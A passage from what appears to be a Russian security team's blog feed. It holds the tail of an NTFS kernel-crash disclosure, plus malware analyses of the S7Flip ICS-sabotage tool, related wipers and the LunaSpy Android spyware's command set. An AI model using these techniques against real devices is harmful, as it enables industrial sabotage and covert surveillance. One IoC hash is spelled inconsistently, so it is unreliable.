    Key  : Bugcheck.Code.TargetModel
    Value: 0x50

    Key  : Failure.Bucket
    Value: AV_VRF_Ntfs!PageUpdateAnalysis

    Key  : Failure.Exception.IP.Address
    Value: 0xfffff80628a319a0

    Key  : Failure.Exception.IP.Module
    Value: Ntfs

    Key  : Failure.Exception.IP.Offset
    Value: 0x1d19a0

    Key  : Failure.Hash
    Value: {9d54520b-212c-9f3b-ad4b-052c7a9e7f7e}

    Key  : Faulting.IP.Type
    Value: Paged

    Key  : Hypervisor.Enlightenments.Value
    Value: 1113060

    Key  : Hypervisor.Enlightenments.ValueHex
    Value: 0x10fbe4

    Key  : Hypervisor.Flags.AnyHypervisorPresent
    Value: 1

    Key  : Hypervisor.Flags.ApicEnlightened
    Value: 0

    Key  : Hypervisor.Flags.ApicVirtualizationAvailable
    Value: 0

    Key  : Hypervisor.Flags.AsyncMemoryHint
    Value: 0

    Key  : Hypervisor.Flags.CoreSchedulerRequested
    Value: 0

    Key  : Hypervisor.Flags.CpuManager
    Value: 0

    Key  : Hypervisor.Flags.DeprecateAutoEoi
    Value: 1

    Key  : Hypervisor.Flags.DynamicCpuDisabled
    Value: 1

    Key  : Hypervisor.Flags.Epf
    Value: 0

    Key  : Hypervisor.Flags.ExtendedProcessorMasks
    Value: 1

    Key  : Hypervisor.Flags.HardwareMbecAvailable
    Value: 0

    Key  : Hypervisor.Flags.MaxBankNumber
    Value: 0

    Key  : Hypervisor.Flags.MemoryZeroingControl
    Value: 0

    Key  : Hypervisor.Flags.NoExtendedRangeFlush
    Value: 0

    Key  : Hypervisor.Flags.NoNonArchCoreSharing
    Value: 0

    Key  : Hypervisor.Flags.Phase0InitDone
    Value: 1

    Key  : Hypervisor.Flags.PowerSchedulerQos
    Value: 0

    Key  : Hypervisor.Flags.RootScheduler
    Value: 0

    Key  : Hypervisor.Flags.SynicAvailable
    Value: 1

    Key  : Hypervisor.Flags.UseQpcBias
    Value: 0

    Key  : Hypervisor.Flags.Value
    Value: 528572

    Key  : Hypervisor.Flags.ValueHex
    Value: 0x810bc

    Key  : Hypervisor.Flags.VpAssistPage
    Value: 1

    Key  : Hypervisor.Flags.VsmAvailable
    Value: 0

    Key  : Hypervisor.RootFlags.AccessStats
    Value: 0

    Key  : Hypervisor.RootFlags.CrashdumpEnlightened
    Value: 0

    Key  : Hypervisor.RootFlags.CreateVirtualProcessor
    Value: 0

    Key  : Hypervisor.RootFlags.DisableHyperthreading
    Value: 0

    Key  : Hypervisor.RootFlags.HostTimelineSync
    Value: 0

    Key  : Hypervisor.RootFlags.HypervisorDebuggingEnabled
    Value: 0

    Key  : Hypervisor.RootFlags.IsHyperV
    Value: 0

    Key  : Hypervisor.RootFlags.LivedumpEnlightened
    Value: 0

    Key  : Hypervisor.RootFlags.MapDeviceInterrupt
    Value: 0

    Key  : Hypervisor.RootFlags.MceEnlightened
    Value: 0

    Key  : Hypervisor.RootFlags.Nested
    Value: 0

    Key  : Hypervisor.RootFlags.StartLogicalProcessor
    Value: 0

    Key  : Hypervisor.RootFlags.Value
    Value: 0

    Key  : Hypervisor.RootFlags.ValueHex
    Value: 0x0

    Key  : SecureKernel.HalpHvciEnabled
    Value: 0

    Key  : WER.OS.Branch
    Value: ge_release

    Key  : WER.OS.Version
    Value: 10.0.26100.1


BUGCHECK_CODE:  50

BUGCHECK_P1: ffff8f8d385d1000

BUGCHECK_P2: 2

BUGCHECK_P3: fffff80628a319a0

BUGCHECK_P4: 2

FAULTING_THREAD:  ffff8f8d2e595040

EXCEPTION_PARAMETER1:  0000000000000001

EXCEPTION_PARAMETER2:  ffff8f8d385d1000

WRITE_ADDRESS:  ffff8f8d385d1000 Special pool

MM_INTERNAL_CODE:  2

PROCESS_NAME:  System

IP_IN_PAGED_CODE: 
Ntfs!PageUpdateAnalysis+140
fffff806`28a319a0 498944ca20      mov     qword ptr &#x5B;r10+rcx*8+20h],rax

STACK_TEXT:  
ffffe180`efdef068 fffff806`959ace42     : ffffe180`efdef0e8 00000000`00000001 00000000`00000080 fffff806`95ab7901 : nt!DbgBreakPointWithStatus
ffffe180`efdef070 fffff806`959ac36c     : 00000000`00000003 ffffe180`efdef1d0 fffff806`95ab7b00 ffffe180`efdef790 : nt!KiBugCheckDebugBreak+0x12
ffffe180`efdef0d0 fffff806`958f6537     : 00000000`00000000 fffff806`957d1cb6 ffff8f8d`385d1000 00000000`00000000 : nt!KeBugCheck2+0xb2c
ffffe180`efdef860 fffff806`957d194c     : 00000000`00000050 ffff8f8d`385d1000 00000000`00000002 ffffe180`efdefb00 : nt!KeBugCheckEx+0x107
ffffe180`efdef8a0 fffff806`95640510     : 00000000`00000000 ffff8000`00000000 ffff8f8d`385d1000 0000007f`fffffff8 : nt!MiSystemFault+0x7a0
ffffe180`efdef990 fffff806`95aacfcb     : 00000000`00000000 00000000`00000000 00000000`00000008 00000000`00000000 : nt!MmAccessFault+0x630
ffffe180`efdefb00 fffff806`28a319a0     : ffffe180`efdeff90 00000000`00000001 ffff8f8d`356279b8 00000000`00000001 : nt!KiPageFault+0x38b
ffffe180`efdefc90 fffff806`28a30f6f     : 00000000`00a8942b ffffe180`efdf08f0 ffff8f8d`357c85d8 00000000`000000e0 : Ntfs!PageUpdateAnalysis+0x140
ffffe180`efdefe10 fffff806`28a95000     : ffff8f8d`3514b7c8 ffff8f8d`357c81b0 00000000`00000000 ffffe180`efdeff90 : Ntfs!AnalysisPass+0x22b
ffffe180`efdeff30 fffff806`28a1c3be     : ffff8f8d`3514b988 00000000`00000001 ffff8f8d`3514b7c8 ffff8f8d`3514b988 : Ntfs!NtfsRestartVolume+0xbc
ffffe180`efdf00a0 fffff806`28a19f86     : 00000000`00000000 00000000`00000000 00000000`00000000 ffff8f8d`2e5950b8 : Ntfs!NtfsMountVolume+0x1816
ffffe180`efdf07e0 fffff806`2888e639     : ffff8f8d`3514b7c8 ffffe180`efdf08f0 00000000`00000008 ffff8f8d`2e595040 : Ntfs!NtfsCommonFileSystemControl+0xb6
ffffe180`efdf08c0 fffff806`956db7ec     : ffff8f8d`2e595040 ffff8f8d`2e595040 ffff8f8d`2a757ae0 fffff806`2888e020 : Ntfs!NtfsFspDispatch+0x619
ffffe180`efdf0a10 fffff806`95881afa     : ffff8f8d`2e595040 ffff8f8d`2e595040 fffff806`956db200 ffff8f8d`2a757ae0 : nt!ExpWorkerThread+0x5ec
ffffe180`efdf0bf0 fffff806`95a9ef84     : fffff806`2625e180 ffff8f8d`2e595040 fffff806`95881aa0 00000000`00000000 : nt!PspSystemThreadStartup+0x5a
ffffe180`efdf0c40 00000000`00000000     : ffffe180`efdf1000 ffffe180`efdeb000 00000000`00000000 00000000`00000000 : nt!KiStartSystemThread+0x34


SYMBOL_NAME:  Ntfs!PageUpdateAnalysis+140

MODULE_NAME: Ntfs

IMAGE_NAME:  Ntfs.sys

IMAGE_VERSION:  10.0.26100.6899

STACK_COMMAND: .process /r /p 0xffff8f8d2a691040; .thread /r /p 0xffff8f8d2e595040 ; kb

BUCKET_ID_FUNC_OFFSET:  140

FAILURE_BUCKET_ID:  AV_VRF_Ntfs!PageUpdateAnalysis

OS_VERSION:  10.0.26100.1

BUILDLAB_STR:  ge_release

OSPLATFORM_TYPE:  x64

OSNAME:  Windows 10

FAILURE_ID_HASH:  {9d54520b-212c-9f3b-ad4b-052c7a9e7f7e}

Followup:     MachineOwner
---------

</pre></div>


<p class="wp-block-paragraph">Дальнейшая эксплуатация уязвимости не представляет сложности.</p>



<h3 class="wp-block-heading">Хронология раскрытия информации</h3>



<ul class="wp-block-list">
<li><strong>23 сентября 2025 года</strong> — производитель был уведомлен об уязвимости и получил технический отчет.</li>



<li><strong>25 сентября 2025 года</strong> — производитель завершил внутренний анализ и подтвердил наличие уязвимости. Были предоставлены предварительные сроки выпуска исправления и публикации бюллетеня безопасности.</li>



<li><strong>26 сентября 2025 года</strong> — производитель был уведомлен о планируемом публичном раскрытии информации.</li>



<li><strong>13 января 2026 года</strong> — были выпущены обновления безопасности и опубликован бюллетень.</li>
</ul>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Этот ваш Siemens&#8230;</title>
		<link>/this-is-siemens/</link>
		
		<dc:creator><![CDATA[global_author]]></dc:creator>
		<pubDate>Tue, 29 Sep 2026 18:38:28 +0000</pubDate>
				<category><![CDATA[Разное]]></category>
		<category><![CDATA[ioc]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[win]]></category>
		<guid isPermaLink="false">/%d1%8d%d1%82%d0%be%d1%82-%d0%b2%d0%b0%d1%88-siemens/</guid>

					<description><![CDATA[Недавно наши коллеги из Центра промышленной экспертизы Позитива обнаружили на MalwareBazaar один любопытный Windows-образец. Вот его SHA-256: e014dadf6d93b312b93e2fc857791c241692da4015da7a24a4d42a946551add2 Наше внимание привлекло сообщение от аккаунта, с которого залили данный сэмпл: Хм, ICS-вредонос, причем…]]></description>
										<content:encoded><![CDATA[<p>Недавно наши коллеги из Центра промышленной экспертизы Позитива обнаружили на MalwareBazaar один любопытный Windows-образец. Вот его SHA-256:</p>
<pre><code>e014dadf6d93b312b93e2fc857791c241692da4015da7a24a4d42a946551add2</code></pre>
<p>Наше внимание привлекло сообщение от аккаунта, с которого залили данный сэмпл:</p>
<figure class="wp-block-image"><img fetchpriority="high" decoding="async" class="attachment-large size-large" src="/wp-content/uploads/2026/09/photo_636@29-09-2026_18-38-28-1024x291.jpg" sizes="auto, (max-width: 1024px) 100vw, 1024px" srcset="/wp-content/uploads/2026/09/photo_636@29-09-2026_18-38-28-1024x291.jpg 1024w, /wp-content/uploads/2026/09/photo_636@29-09-2026_18-38-28-300x85.jpg 300w, /wp-content/uploads/2026/09/photo_636@29-09-2026_18-38-28-768x218.jpg 768w, /wp-content/uploads/2026/09/photo_636@29-09-2026_18-38-28.jpg 1280w" alt="" width="1024" height="291" /></figure>
<p>Хм, ICS-вредонос, причем уже с готовым названием S7Flip (то есть нам даже не нужно напрягать свою фантазию, чтобы назвать его)? Звучит интересно! Давайте взглянем, что там внутри.</p>
<p>После закрепления в автозапуске под названием <code>aphp.exe</code> сэмпл начинает собирать адреса устройств в локальной сети — это адреса <code>192.168.*.*</code>, <code>10.*.*.*</code> и <code>172.*.*.*</code>, после чего проверяет на них наличие определенных открытых портов, которые широко используются промышленными устройствами:</p>
<ul>
<li><strong>102</strong> — в основном используют контроллеры Siemens для взаимодействия по протоколу S7Comm или S7Comm+.</li>
<li><strong>502</strong> — стандартный порт протокола Modbus TCP; его могут использовать устройства любых производителей.</li>
<li><strong>44818</strong> — в основном используют контроллеры Allen-Bradley (Rockwell) для взаимодействия по протоколу EtherNet/IP (CIP).</li>
</ul>
<p>Подключение к устройствам Allen-Bradley (Rockwell) фактически не работает. Реализация клиента для EtherNet/IP (CIP) отсутствует: ветка переиспользует Siemens-клиент и пытается подключиться по порту 102 как к контроллеру Siemens. С настоящим Allen-Bradley соединение не установится — воздействие на устройства, открывшие только порт 44818, не оказывается вовсе.</p>
<p>Определив нужные устройства, S7Flip подключается к ним и начинает применять один из деструктивных механизмов (или сразу оба).</p>
<h2>Механизм 1: «randomize» значений</h2>
<p>По S7Comm (порт 102): по очереди обходит блоки DB 1–10; для каждого выбирает случайное смещение 0–99, читает оттуда 4-байтовое целое, прибавляет случайное целое число от −10 до +10 и записывает обратно.</p>
<p>По Modbus TCP (порт 502): выбирает 16-битный holding-регистр по случайному адресу 0–99, читает текущее значение, прибавляет случайное целое число от −10 до +10 и записывает обратно.</p>
<h2>Механизм 2: инверсия битов (findAndModifyInputs)</h2>
<p>По S7Comm (порт 102): последовательно проходит первые 100 байтов в блоках DB 1–10: читает байт, меняет его младший бит на противоположный и записывает обратно.</p>
<p>По Modbus TCP (порт 502): последовательно проходит однобитовые ячейки записи (coils — дискретные выводы, команды, флаги) в диапазоне 0–255: читает бит, меняет на противоположный и записывает обратно.</p>
<p>Каждое изменение пишется в <code>logs.csv</code> рядом с исполняемым файлом и содержит пять колонок — время, тег, вендор, старое и новое значение.</p>
<figure class="wp-block-image"><img decoding="async" class="attachment-large size-large" src="/wp-content/uploads/2026/09/photo_637@29-09-2026_18-38-28.jpg" sizes="auto, (max-width: 539px) 100vw, 539px" srcset="/wp-content/uploads/2026/09/photo_637@29-09-2026_18-38-28.jpg 539w, /wp-content/uploads/2026/09/photo_637@29-09-2026_18-38-28-300x257.jpg 300w" alt="" width="539" height="461" /></figure>
<p>Помимо данного бинаря, мы также нашли еще один:</p>
<pre><code>88717716e54b35682a28d673764975d439a31ee194c85dfc619a15ea93ab1280</code></pre>
<p>По логике работы он ничем не отличается от рассмотренного ранее образца. Главное отличие заключается в том, что библиотека <code>libmodbus</code>, реализующая работу протокола Modbus, в <code>e014dadf6d93b312b93e2fc857791c241692da4015da7a24a4d42a946551add2</code> динамически слинкована, а в <code>88717716e54b35682a28d673764975d439a31ee194c85dfc619a15ea93ab1280</code> — статически.</p>
<p>В этот же день с этого же аккаунта <code>jeans</code>, помимо <code>e014dadf6d93b312b93e2fc857791c241692da4015da7a24a4d42a946551add2</code> (название файла — <code>Edge.exe</code>), был залит еще один бинарь:</p>
<pre><code>2c57c1a39933514c63b5a7b585f5948ead04b65e4df96fb595ccda84208c4aa0</code></pre>
<p>При ближайшем рассмотрении он оказался вайпером. При запуске он по-джентльменски спрашивает, не хотите ли вы установить Microsoft Edge:</p>
<figure class="wp-block-image"><img decoding="async" class="attachment-large size-large" src="/wp-content/uploads/2026/09/photo_638@29-09-2026_18-38-28.jpg" sizes="auto, (max-width: 807px) 100vw, 807px" srcset="/wp-content/uploads/2026/09/photo_638@29-09-2026_18-38-28.jpg 807w, /wp-content/uploads/2026/09/photo_638@29-09-2026_18-38-28-300x58.jpg 300w, /wp-content/uploads/2026/09/photo_638@29-09-2026_18-38-28-768x148.jpg 768w" alt="" width="807" height="156" /></figure>
<p>И если вы отказываетесь, то вайпер прекращает свою работу 😅</p>
<p>Но вот если вы соглашаетесь&#8230; то будьте готовы к «непредвиденным обстоятельствам». Вот их список:</p>
<ul>
<li>рекурсивное удаление всего содержимого папки <code>%USERPROFILE%\Desktop</code>;</li>
<li>там же будет создан файл <code>compiled-desktop</code>, который будет содержать ровно <code>1 048 576</code> случайных байт;</li>
<li>ну и, разумеется, файл <code>README.txt</code> с вежливой просьбой перевести биткоины в размере 100 долларов.</li>
</ul>
<p>После всего этого вредонос добавляет себя в автозапуск.</p>
<p>Расшифровка файлов не предусмотрена: содержимое рабочего стола нигде не сохраняется. Это псевдовымогатель-вайпер.</p>
<p>Самое интересное, что в <code>README.txt</code> указан кошелек, на который злоумышленники предлагают переслать деньги: <code>bc1qp6ejw8ptj9l9pkscmlf8fhhkrrjeawgpyjvtq8</code> — это официальный кошелек для донатов проекта <code>Bitcoin.org</code>. Т. е. жулики на самом деле не хотят выкупа? Хм, интересно&#8230; 🤑</p>
<p>Чуть позже <code>jeans</code> залил еще один вариант данного инструмента — <code>f47502628708300840efe2771a3c5e7e9a631205512f0a2ee6382a00a92056e2</code>, причем на этот раз файл называется не <code>Edge.exe</code>, а <code>Edgev5.exe</code>.</p>
<p>Обозначает ли v5 какое-то развитие или дальнейшее улучшение вредоноса? Да, в новой версии автор добавил симметричное шифрование файлов с помощью AES-256-GCM, а также расширил количество папок для шифрования: теперь помимо Desktop шифрованию подлежат Downloads и Documents. Правда, есть один нюанс&#8230; ключ для расшифрования данных находится в файле <code>master_key.dat</code>, да и биткоин-кошелек такой же, как и в более ранней версии вайпера.</p>
<p>По всей видимости, автор вредоноса активно развивает и тестирует свой инструмент. Возможно, в будущем он начнет активно применять его в «боевом» виде.</p>
<h2>А какая связь между S7Flip и вайперами? 🧐</h2>
<p>В ходе чтения данного поста у вас, возможно, возник вопрос: «а как связаны S7Flip и вайпер между собой?» И на самом деле определенные совпадения есть:</p>
<ul>
<li>все бинари были собраны с помощью тулчейна GCC 16.2.0;</li>
<li>timestamp сборки PE-файлов <code>88717716e54b35682a28d673769475d439a31ee194c85dfc619a15ea93ab1280</code> (S7Flip) и <code>2c57c1a39933514c63b5a7b585f5948ead04b65e4df96fb595ccda84208c4aa0</code> (<code>Edge.exe</code>) совпадает с точностью до дня — 2026-09-13;</li>
<li>общий аккаунт, с которого файлы были залиты на MalwareBazaar, — <code>jeans</code>.</li>
</ul>
<p>Достаточно ли этих данных, чтобы утверждать, что S7Flip и вайперы разработаны одним и тем же автором? Нет, определенные сомнения все равно остаются, но некоторая взаимосвязь все же есть.</p>
<h2>IoCs</h2>
<table>
<tbody>
<tr>
<th>SHA-256</th>
<th>Имя</th>
<th style="text-align: center;">PT Fusion</th>
</tr>
<tr>
<td><code>88717716e54b35682a28d673769475d439a31ee194c85dfc619a15ea93ab1280</code></td>
<td>S7Flip</td>
<td style="text-align: center;"><a href="https://fusion.ptsecurity.com/shared/iocs/c4cb038a-718a-4509-a22a-151d0ebf310a" target="_blank" rel="noopener">Открыть ↗</a></td>
</tr>
<tr>
<td><code>e014dadf6d93b312b93e2fc857791c241692da4015da7a24a4d42a946551add2</code></td>
<td>S7Flip</td>
<td style="text-align: center;"><a href="https://fusion.ptsecurity.com/shared/iocs/3ca9e76f-e2d8-4da7-85ed-4c950bb25d26" target="_blank" rel="noopener">Открыть ↗</a></td>
</tr>
<tr>
<td><code>2c57c1a39933514c63b5a7b585f5948ead04b65e4df96fb595ccda84208c4aa0</code></td>
<td>Edge.exe (ver 1)</td>
<td style="text-align: center;"><a href="https://fusion.ptsecurity.com/shared/iocs/ebdd1e1e-02e6-4b42-adf3-d7ca2356cde2" target="_blank" rel="noopener">Открыть ↗</a></td>
</tr>
<tr>
<td><code>f47502628708300840efe2771a3c5e7e9a631205512f0a2ee6382a00a92056e2</code></td>
<td>Edgev5.exe</td>
<td style="text-align: center;"><a href="https://fusion.ptsecurity.com/shared/iocs/e50f6bc0-5e19-4ea5-8460-5840e32ec2ec" target="_blank" rel="noopener">Открыть ↗</a></td>
</tr>
</tbody>
</table>
<p><span class="hashtag">#malware</span> <span class="hashtag">#win</span> <span class="hashtag">#ioc</span><br />
<a href="https://t.me/ptescalator" target="_blank" rel="noopener">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Анти-антивирус</title>
		<link>/anti-antivirus/</link>
		
		<dc:creator><![CDATA[global_author]]></dc:creator>
		<pubDate>Mon, 28 Sep 2026 15:29:43 +0000</pubDate>
				<category><![CDATA[Разное]]></category>
		<category><![CDATA[android]]></category>
		<category><![CDATA[malware]]></category>
		<guid isPermaLink="false">/%d0%b0%d0%bd%d1%82%d0%b8-%d0%b0%d0%bd%d1%82%d0%b8%d0%b2%d0%b8%d1%80%d1%83%d1%81/</guid>

					<description><![CDATA[Недавно нам на глаза попалась APK-шка с интригующим и внушающим доверие названием «Антивирус ФСБ.apk». Установив его, мы обнаружили, что при запуске пользователя встречает интерфейс известной программы для управления звонками на Android —…]]></description>
										<content:encoded><![CDATA[<p>Недавно нам на глаза попалась APK-шка с интригующим и внушающим доверие названием «<code>Антивирус ФСБ.apk</code>».</p>
<p>Установив его, мы обнаружили, что при запуске пользователя встречает интерфейс известной программы для управления звонками на <code>Android — Right Dialer</code> от разработчика <a href="https://github.com/Goodwy/Dialer" rel="noopener" target="_blank">Goodwy</a>.</p>
<p>Вероятнее всего, выбор злоумышленников пал именно на это приложение, так как оно запрашивает большое количество разрешений: работа с контактами, выполнение звонков, доступ к камере и так далее.</p>
<figure class="wp-block-image"><img width="1011" height="1012" src="/wp-content/uploads/2026/09/photo_623@28-09-2026_15-29-43.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/09/photo_623@28-09-2026_15-29-43.jpg 1011w, /wp-content/uploads/2026/09/photo_623@28-09-2026_15-29-43-300x300.jpg 300w, /wp-content/uploads/2026/09/photo_623@28-09-2026_15-29-43-150x150.jpg 150w, /wp-content/uploads/2026/09/photo_623@28-09-2026_15-29-43-768x769.jpg 768w" sizes="auto, (max-width: 1011px) 100vw, 1011px" /><figcaption>Фрагмент AndroidManifest приложения Goodwy</figcaption></figure>
<figure class="wp-block-image"><img width="1024" height="721" src="/wp-content/uploads/2026/09/photo_624@28-09-2026_15-29-43-1024x721.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/09/photo_624@28-09-2026_15-29-43-1024x721.jpg 1024w, /wp-content/uploads/2026/09/photo_624@28-09-2026_15-29-43-300x211.jpg 300w, /wp-content/uploads/2026/09/photo_624@28-09-2026_15-29-43-768x541.jpg 768w, /wp-content/uploads/2026/09/photo_624@28-09-2026_15-29-43-1536x1082.jpg 1536w, /wp-content/uploads/2026/09/photo_624@28-09-2026_15-29-43.jpg 1706w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption>Запрашиваемые разрешения</figcaption></figure>
<p>Открыв <code>AndroidManifest.xml</code>, нетрудно увидеть, что основной пакет —<code> com.syscore.toolsuite</code>, а не <code>com.goodwy.dialer</code>. Это означает, что код Goodwy был встроен в чужое приложение — уже известный Android-шпион <code>LunaSpy</code>, более ранняя версия которого была <a href="https://www.f6.ru/blog/lunaspy-android-research" rel="noopener" target="_blank">рассмотрена в статье</a>.</p>
<figure class="wp-block-image"><img width="1024" height="691" src="/wp-content/uploads/2026/09/photo_625@28-09-2026_15-29-43-1024x691.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/09/photo_625@28-09-2026_15-29-43-1024x691.jpg 1024w, /wp-content/uploads/2026/09/photo_625@28-09-2026_15-29-43-300x202.jpg 300w, /wp-content/uploads/2026/09/photo_625@28-09-2026_15-29-43-768x518.jpg 768w, /wp-content/uploads/2026/09/photo_625@28-09-2026_15-29-43.jpg 1061w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption>Goodwy в activity-alias</figcaption></figure>
<p>Перед статическим исследованием образца мы запустили его в песочнице <code>PT Sandbox</code>, чтобы получить общее представление о работе ВПО:</p>
<figure class="wp-block-image"><img width="1024" height="586" src="/wp-content/uploads/2026/09/photo_626@28-09-2026_15-29-43-1024x586.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/09/photo_626@28-09-2026_15-29-43-1024x586.jpg 1024w, /wp-content/uploads/2026/09/photo_626@28-09-2026_15-29-43-300x172.jpg 300w, /wp-content/uploads/2026/09/photo_626@28-09-2026_15-29-43-768x440.jpg 768w, /wp-content/uploads/2026/09/photo_626@28-09-2026_15-29-43.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption>Запуск приложения в PT Sandbox</figcaption></figure>
<p><strong>Ключевые наблюдения из динамического анализа:</strong></p>
<ul>
<li>Коммуникация с управляющими серверами</li>
<li>Получение привилегий</li>
<li>Создание скрытых файлов</li>
</ul>
<p>Злоумышленники расширили свой шпион рядом новых команд (как говорится, если используешь <code>Accessibility Service</code>, то используй его по полной):</p>
<ul>
<li><code>GET_CALL_RECORDINGS</code> — отправляет на управляющий сервер список имен файлов, перебирая файлы с расширением <code>.wav</code>, чей размер больше 44 байтов (размер заголовка WAV), в директории <code>getFilesDir()/call_recordings</code></li>
<li><code>DOWNLOAD_CALL_RECORDING</code> — отправляет на управляющий сервер запись звонка с указанным id, закодированную в Base64</li>
<li><code>SET_REDIRECT_RULES</code>, <code>GET_REDIRECT_RULES</code> — подмена исходящих звонков согласно полученным с управляющего сервера правилам</li>
<li>Добавилось больше команд для управления логированием устройства: <code>REQUEST_LOGS</code>, <code>CLEAR_LOGS</code>, <code>LOGGING_ENABLE</code>, <code>LOGGING_DISABLE</code></li>
<li><code>RESET_SOFT</code>, <code>RESET_DEEP</code>, <code>RESET_GLOBAL</code> — перезапуск части или всех вспомогательных сервисов шпиона</li>
<li><code>RESET_REBOOT</code> — имитация перезагрузки устройства (при получении — останавливает свои сервисы, отменяет задачи <code>WorkManager</code>, имитирует задержку при загрузке системы (8 секунд), после чего перезапускает сервисы)</li>
<li><code>GET_SCREEN_TREE</code> — получить параметры текущего экрана: width, height, объекты на экране, их позиции, текст и свойства</li>
<li>Сложные команды с параметрами для управления устройством (имитация действий пользователя): <code>PERFORM_TAP</code> (выполнить нажатие на экран), <code>PERFORM_SWIPE</code> (провести по экрану), <code>PERFORM_INPUT_TEXT</code> (выполнить вставку текста), <code>PERFORM_PATH_GESTURE</code> (выполнить жест по заданным позициям с определенной длительностью нажатия), <code>PERFORM_PATTERN_UNLOCK</code> (команда похожа на <code>PERFORM_PATH_GESTURE</code>, однако предназначена для адаптивных паттернов, например, разблокировка по рисунку), <code>PERFORM_BACK</code> (выполнить действие «назад»), <code>PERFORM_HOME</code> (выполнить переход на домашний экран), <code>PERFORM_RECENTS</code> (просмотреть список недавних приложений) — команды, активно использующие функции <code>PerformGlobalAction</code> и механизм <code>GestureDescription</code></li>
<li><code>REVIVE_PERMISSIONS</code> — показывает пользователю уведомление поверх всех окон с целью получения прав <code>android.permission.CAMERA</code> и <code>android.permission.RECORD_AUDIO</code></li>
<li><code>DISABLE_PLAY_PROTECT</code> — отключить глобальную настройку в Android (<code>Settings.Global.PACKAGE_VERIFIER_ENABLE</code>), которая управляет проверкой приложений перед их установкой</li>
</ul>
<p>Кроме того, ряд строк (например, IP-адреса, названия некоторых команд) шифруется алгоритмом XOR для усложнения анализа.</p>
<figure class="wp-block-image"><img width="923" height="361" src="/wp-content/uploads/2026/09/photo_627@28-09-2026_15-29-43.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/09/photo_627@28-09-2026_15-29-43.jpg 923w, /wp-content/uploads/2026/09/photo_627@28-09-2026_15-29-43-300x117.jpg 300w, /wp-content/uploads/2026/09/photo_627@28-09-2026_15-29-43-768x300.jpg 768w" sizes="auto, (max-width: 923px) 100vw, 923px" /><figcaption>Шифрование строк</figcaption></figure>
<figure class="wp-block-image"><img width="969" height="651" src="/wp-content/uploads/2026/09/photo_628@28-09-2026_15-29-43.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/09/photo_628@28-09-2026_15-29-43.jpg 969w, /wp-content/uploads/2026/09/photo_628@28-09-2026_15-29-43-300x202.jpg 300w, /wp-content/uploads/2026/09/photo_628@28-09-2026_15-29-43-768x516.jpg 768w" sizes="auto, (max-width: 969px) 100vw, 969px" /><figcaption>Реализация команды DOWNLOAD_CALL_RECORDING</figcaption></figure>
<figure class="wp-block-image"><img width="805" height="182" src="/wp-content/uploads/2026/09/photo_629@28-09-2026_15-29-43.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/09/photo_629@28-09-2026_15-29-43.jpg 805w, /wp-content/uploads/2026/09/photo_629@28-09-2026_15-29-43-300x68.jpg 300w, /wp-content/uploads/2026/09/photo_629@28-09-2026_15-29-43-768x174.jpg 768w" sizes="auto, (max-width: 805px) 100vw, 805px" /><figcaption>Реализация команды DISABLE_PLAY_PROTECT</figcaption></figure>
<figure class="wp-block-image"><img width="1024" height="460" src="/wp-content/uploads/2026/09/photo_630@28-09-2026_15-29-43-1024x460.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/09/photo_630@28-09-2026_15-29-43-1024x460.jpg 1024w, /wp-content/uploads/2026/09/photo_630@28-09-2026_15-29-43-300x135.jpg 300w, /wp-content/uploads/2026/09/photo_630@28-09-2026_15-29-43-768x345.jpg 768w, /wp-content/uploads/2026/09/photo_630@28-09-2026_15-29-43.jpg 1059w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption>Реализация команды REVIVE_PERMISSIONS</figcaption></figure>
<figure class="wp-block-image"><img width="752" height="488" src="/wp-content/uploads/2026/09/photo_631@28-09-2026_15-29-43.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/09/photo_631@28-09-2026_15-29-43.jpg 752w, /wp-content/uploads/2026/09/photo_631@28-09-2026_15-29-43-300x195.jpg 300w" sizes="auto, (max-width: 752px) 100vw, 752px" /><figcaption>Реализация команды GET_SCREEN_TREE</figcaption></figure>
<figure class="wp-block-image"><img width="825" height="684" src="/wp-content/uploads/2026/09/photo_632@28-09-2026_15-29-43.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/09/photo_632@28-09-2026_15-29-43.jpg 825w, /wp-content/uploads/2026/09/photo_632@28-09-2026_15-29-43-300x249.jpg 300w, /wp-content/uploads/2026/09/photo_632@28-09-2026_15-29-43-768x637.jpg 768w" sizes="auto, (max-width: 825px) 100vw, 825px" /><figcaption>Реализация команды RESET_REBOOT</figcaption></figure>
<figure class="wp-block-image"><img width="747" height="287" src="/wp-content/uploads/2026/09/photo_633@28-09-2026_15-29-43.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/09/photo_633@28-09-2026_15-29-43.jpg 747w, /wp-content/uploads/2026/09/photo_633@28-09-2026_15-29-43-300x115.jpg 300w" sizes="auto, (max-width: 747px) 100vw, 747px" /><figcaption>Пример реализации PERFORM_SWIPE</figcaption></figure>
<p>Вредоносное ПО демонстрирует устойчивую тенденцию к развитию: от простого шпионажа к комплексному контролю устройства с элементами антиобнаружения, масштабируемой инфраструктурой и усовершенствованными методами социальной инженерии. Это требует от пользователей и специалистов по безопасности постоянного повышения уровня защиты и бдительности.</p>
<h2>Меры предосторожности:</h2>
<ul>
